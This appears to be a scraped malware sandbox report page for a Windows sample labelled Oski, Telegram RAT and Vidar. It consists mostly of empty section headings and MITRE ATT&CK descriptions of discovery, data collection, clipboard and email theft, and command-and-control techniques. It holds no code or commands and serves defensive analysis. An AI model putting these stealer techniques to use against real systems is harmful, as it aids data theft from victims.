Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Oski

Threatname: Telegram RAT

Threatname: Vidar

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Stealing of Sensitive Information:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre